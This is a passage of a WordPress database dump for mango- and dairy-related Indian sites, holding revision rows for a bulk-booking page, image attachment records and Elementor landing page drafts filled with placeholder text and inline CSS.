aria-describedby=\"wp-block-file--media-c9a85655-b063-44b4-a7f7-4cd279eb908d\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Bulk Booking','','inherit','closed','closed','','1204-revision-v1','','','2022-03-16 17:36:03','2022-03-16 12:06:03','',1204,'https://mangomitra.in/?p=1294',0,'revision','',0),(1296,1,'2022-03-16 17:36:29','2022-03-16 12:06:29','<!-- wp:heading {\"level\":3} -->\n<h3>Send your bulk order details now &amp; we will get back to you shortly!</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Download bulk booking form, fill the details and send it to mango@homedirect.in.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For more details please contact (+91)7259272171</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:file {\"id\":1290,\"href\":\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-c9a85655-b063-44b4-a7f7-4cd279eb908d\" href=\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\">bulk_booking_form</a><a href=\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\" class=\"wp-block-file__button\" download aria-describedby=\"wp-block-file--media-c9a85655-b063-44b4-a7f7-4cd279eb908d\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Bulk Booking','','inherit','closed','closed','','1204-revision-v1','','','2022-03-16 17:36:29','2022-03-16 12:06:29','',1204,'https://mangomitra.in/?p=1296',0,'revision','',0),(1297,1,'2022-03-16 17:36:52','2022-03-16 12:06:52','<!-- wp:heading {\"level\":3} -->\n<h3>Send your bulk order details now &amp; we will get back to you shortly!</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Download bulk booking form, fill the details and send it to mango@homedirect.in</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For more details please contact (+91)7259272171</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:file {\"id\":1290,\"href\":\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-c9a85655-b063-44b4-a7f7-4cd279eb908d\" href=\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\">bulk_booking_form</a><a href=\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\" class=\"wp-block-file__button\" download aria-describedby=\"wp-block-file--media-c9a85655-b063-44b4-a7f7-4cd279eb908d\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Bulk Booking','','inherit','closed','closed','','1204-revision-v1','','','2022-03-16 17:36:52','2022-03-16 12:06:52','',1204,'https://mangomitra.in/?p=1297',0,'revision','',0),(1299,1,'2022-03-18 12:37:10','2022-03-18 07:07:10','','Artboard 1-8','','inherit','closed','closed','','artboard-1-8-3','','','2022-03-18 12:37:10','2022-03-18 07:07:10','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Artboard-1-8-1.png',0,'attachment','image/png',0),(1300,1,'2022-03-18 12:37:12','2022-03-18 07:07:12','','Artboard 2-8','','inherit','closed','closed','','artboard-2-8-3','','','2022-03-18 12:37:12','2022-03-18 07:07:12','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Artboard-2-8.png',0,'attachment','image/png',0),(1301,1,'2022-03-18 12:37:15','2022-03-18 07:07:15','','Artboard 3-8','','inherit','closed','closed','','artboard-3-8-4','','','2022-03-18 12:37:15','2022-03-18 07:07:15','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Artboard-3-8-1.png',0,'attachment','image/png',0),(1302,1,'2022-03-18 12:37:17','2022-03-18 07:07:17','','Artboard 4-8','','inherit','closed','closed','','artboard-4-8-3','','','2022-03-18 12:37:17','2022-03-18 07:07:17','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Artboard-4-8.png',0,'attachment','image/png',0),(1309,1,'2022-09-15 15:32:14','2022-09-15 10:02:14','','3483-low-poly-light-pink-background-illustrator','','inherit','closed','closed','','3483-low-poly-light-pink-background-illustrator','','','2022-09-15 15:32:14','2022-09-15 10:02:14','',0,'https://gopalak.in/wp-content/uploads/2022/09/3483-low-poly-light-pink-background-illustrator.jpg',0,'attachment','image/jpeg',0),(1313,1,'2022-09-16 09:38:44','0000-00-00 00:00:00','','Elementor Landing Page #1313','','draft','closed','closed','','','','','2022-09-16 09:38:44','2022-09-16 04:08:44','',0,'https://gopalak.in/?post_type=e-landing-page&#038;p=1313',0,'e-landing-page','',0),(1314,1,'2022-09-16 09:38:42','2022-09-16 04:08:42','','Elementor Landing Page #1313','','inherit','closed','closed','','1313-revision-v1','','','2022-09-16 09:38:42','2022-09-16 04:08:42','',1313,'https://gopalak.in/?p=1314',0,'revision','',0),(1315,1,'2022-09-16 09:38:42','2022-09-16 04:08:42','','Elementor Landing Page #1313','','inherit','closed','closed','','1313-revision-v1','','','2022-09-16 09:38:42','2022-09-16 04:08:42','',1313,'https://gopalak.in/?p=1315',0,'revision','',0),(1316,1,'2022-09-16 09:38:44','2022-09-16 04:08:44','','Elementor Landing Page #1313','','inherit','closed','closed','','1313-revision-v1','','','2022-09-16 09:38:44','2022-09-16 04:08:44','',1313,'https://gopalak.in/?p=1316',0,'revision','',0),(1317,1,'2022-09-16 09:42:48','0000-00-00 00:00:00','','Elementor #1317','','draft','closed','closed','','','','','2022-09-16 09:42:48','2022-09-16 04:12:48','',0,'https://gopalak.in/?page_id=1317',0,'page','',0),(1318,1,'2022-09-16 09:42:46','2022-09-16 04:12:46','','Elementor #1317','','inherit','closed','closed','','1317-revision-v1','','','2022-09-16 09:42:46','2022-09-16 04:12:46','',1317,'https://gopalak.in/?p=1318',0,'revision','',0),(1319,1,'2022-09-16 09:53:30','0000-00-00 00:00:00','<style>/*! elementor - v3.7.6 - 15-09-2022 */\nbody.elementor-page .elementor-widget-menu-anchor{margin-bottom:0}</style>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"600\" height=\"296\" src=\"https://gopalak.in/wp-content/uploads/2022/09/elegant-cream-fabric-isolated-on-600w-2179731583.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/elegant-cream-fabric-isolated-on-600w-2179731583.webp 600w, https://gopalak.in/wp-content/uploads/2022/09/elegant-cream-fabric-isolated-on-600w-2179731583-300x148.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/elegant-cream-fabric-isolated-on-600w-2179731583-50x25.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/elegant-cream-fabric-isolated-on-600w-2179731583-48x24.webp 48w\" sizes=\"(max-width: 600px) 100vw, 600px\" />','Elementor Landing Page #1319','','draft','closed','closed','','','','','2022-09-16 09:53:30','2022-09-16 04:23:30','',0,'https://gopalak.in/?post_type=e-landing-page&#038;p=1319',0,'e-landing-page','',0),(1320,1,'2022-09-16 09:44:04','2022-09-16 04:14:04','','Elementor Landing Page #1319','','inherit','closed','closed','','1319-revision-v1','','','2022-09-16 09:44:04','2022-09-16 04:14:04','',1319,'https://gopalak.in/?p=1320',0,'revision','',0),(1321,1,'2022-09-16 09:44:04','2022-09-16 04:14:04','','Elementor Landing Page #1319','','inherit','closed','closed','','1319-revision-v1','','','2022-09-16 09:44:04','2022-09-16 04:14:04','',1319,'https://gopalak.in/?p=1321',0,'revision','',0),(1322,1,'2022-09-16 09:44:05','2022-09-16 04:14:05','','Elementor Landing Page #1319','','inherit','closed','closed','','1319-revision-v1','','','2022-09-16 09:44:05','2022-09-16 04:14:05','',1319,'https://gopalak.in/?p=1322',0,'revision','',0),(1323,1,'2022-09-16 09:52:31','2022-09-16 04:22:31','','elegant-cream-fabric-isolated-on-600w-2179731583','','inherit','closed','closed','','elegant-cream-fabric-isolated-on-600w-2179731583','','','2022-09-16 09:52:31','2022-09-16 04:22:31','',1319,'https://gopalak.in/wp-content/uploads/2022/09/elegant-cream-fabric-isolated-on-600w-2179731583.webp',0,'attachment','image/webp',0),(1324,1,'2022-09-16 10:04:39','0000-00-00 00:00:00','','Elementor #1324','','draft','closed','closed','','','','','2022-09-16 10:04:39','2022-09-16 04:34:39','',0,'https://gopalak.in/?page_id=1324',0,'page','',0),(1325,1,'2022-09-16 10:03:58','2022-09-16 04:33:58','','Elementor #1324','','inherit','closed','closed','','1324-revision-v1','','','2022-09-16 10:03:58','2022-09-16 04:33:58','',1324,'https://gopalak.in/?p=1325',0,'revision','',0),(1326,1,'2022-09-16 10:58:09','0000-00-00 00:00:00','<style>/*! elementor - v3.7.6 - 15-09-2022 */\nbody.elementor-page .elementor-widget-menu-anchor{margin-bottom:0}</style>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />															\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>','Elementor Landing Page #1326','','draft','closed','closed','','','','','2022-09-16 10:58:09','2022-09-16 05:28:09','',0,'https://gopalak.in/?post_type=e-landing-page&#038;p=1326',0,'e-landing-page','',0),(1327,1,'2022-09-16 10:11:30','2022-09-16 04:41:30','','Elementor Landing Page #1326','','inherit','closed','closed','','1326-revision-v1','','','2022-09-16 10:11:30','2022-09-16 04:41:30','',1326,'https://gopalak.in/?p=1327',0,'revision','',0),(1328,1,'2022-09-16 10:11:30','2022-09-16 04:41:30','','Elementor Landing Page #1326','','inherit','closed','closed','','1326-revision-v1','','','2022-09-16 10:11:30','2022-09-16 04:41:30','',1326,'https://gopalak.in/?p=1328',0,'revision','',0),(1329,1,'2022-09-16 10:11:32','2022-09-16 04:41:32','','Elementor Landing Page #1326','','inherit','closed','closed','','1326-revision-v1','','','2022-09-16 10:11:32','2022-09-16 04:41:32','',1326,'https://gopalak.in/?p=1329',0,'revision','',0),(1331,1,'2022-09-16 10:46:21','0000-00-00 00:00:00','','#home','','draft','closed','closed','','','','','2022-09-16 10:46:21','0000-00-00 00:00:00','',0,'https://gopalak.in/?p=1331',1,'nav_menu_item','',0),(1333,1,'2022-09-16 17:04:16','2022-09-16 11:34:16','<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h1>Add Your Heading Text Here</h1>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>','Elementor Landing Page #1333','','publish','closed','closed','','elementor-landing-page-1333','','','2022-09-16 18:27:35','2022-09-16 12:57:35','',0,'https://gopalak.in/?post_type=e-landing-page&#038;p=1333',0,'e-landing-page','',0),(1334,1,'2022-09-16 15:10:33','2022-09-16 09:40:33','','Elementor Landing Page #1333','','inherit','closed','closed','','1333-revision-v1','','','2022-09-16 15:10:33','2022-09-16 09:40:33','',1333,'https://gopalak.in/?p=1334',0,'revision','',0),(1335,1,'2022-09-16 15:10:33','2022-09-16 09:40:33','','Elementor Landing Page #1333','','inherit','closed','closed','','1333-revision-v1','','','2022-09-16 15:10:33','2022-09-16 09:40:33','',1333,'https://gopalak.in/?p=1335',0,'revision','',0),(1336,1,'2022-09-16 15:10:35','2022-09-16 09:40:35','','Elementor Landing Page #1333','','inherit','closed','closed','','1333-revision-v1','','','2022-09-16 15:10:35','2022-09-16 09:40:35','',1333,'https://gopalak.in/?p=1336',0,'revision','',0),(1337,1,'2022-09-16 15:19:47','0000-00-00 00:00:00','','Elementor #1337','','draft','closed','closed','','','','','2022-09-16 15:19:47','2022-09-16 09:49:47','',0,'https://gopalak.in/?page_id=1337',0,'page','',0),(1338,1,'2022-09-16 15:17:28','2022-09-16 09:47:28','','Elementor #1337','','inherit','closed','closed','','1337-revision-v1','','','2022-09-16 15:17:28','2022-09-16 09:47:28','',1337,'https://gopalak.in/?p=1338',0,'revision','',0),(1339,1,'2022-09-16 15:50:51','2022-09-16 10:20:51','','cows-farming-on-green-meadow-260nw-1704884002','','inherit','closed','closed','','cows-farming-on-green-meadow-260nw-1704884002','','','2022-09-16 15:50:51','2022-09-16 10:20:51','',1333,'https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002.webp',0,'attachment','image/webp',0),(1340,1,'2022-09-16 16:11:23','2022-09-16 10:41:23','','banner1','','inherit','closed','closed','','banner1','','','2022-09-16 16:11:23','2022-09-16 10:41:23','',1333,'https://gopalak.in/wp-content/uploads/2022/09/banner1.jpg',0,'attachment','image/jpeg',0),(1342,1,'2022-09-16 18:27:35','2022-09-16 12:57:35','<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h1>Add Your Heading Text Here</h1>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>','Elementor Landing Page #1333','','inherit','closed','closed','','1333-revision-v1','','','2022-09-16 18:27:35','2022-09-16 12:57:35','',1333,'https://gopalak.in/?p=1342',0,'revision','',0),(1343,1,'2022-09-16 18:27:35','2022-09-16 12:57:35','<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h1>Add Your Heading Text Here</h1>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>','Elementor Landing Page #1333','','inherit','closed','closed','','1333-revision-v1','','','2022-09-16 18:27:35','2022-09-16 12:57:35','',1333,'https://gopalak.in/?p=1343',0,'revision','',0),(1344,1,'2022-09-16 18:27:35','2022-09-16 12:57:35','<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h1>Add Your Heading Text Here</h1>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>','Elementor Landing Page #1333','','inherit','closed','closed','','1333-revision-v1','','','2022-09-16 18:27:35','2022-09-16 12:57:35','',1333,'https://gopalak.in/?p=1344',0,'revision','',0),(1350,1,'2022-09-20 16:14:34','2022-09-20 10:44:34','<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media 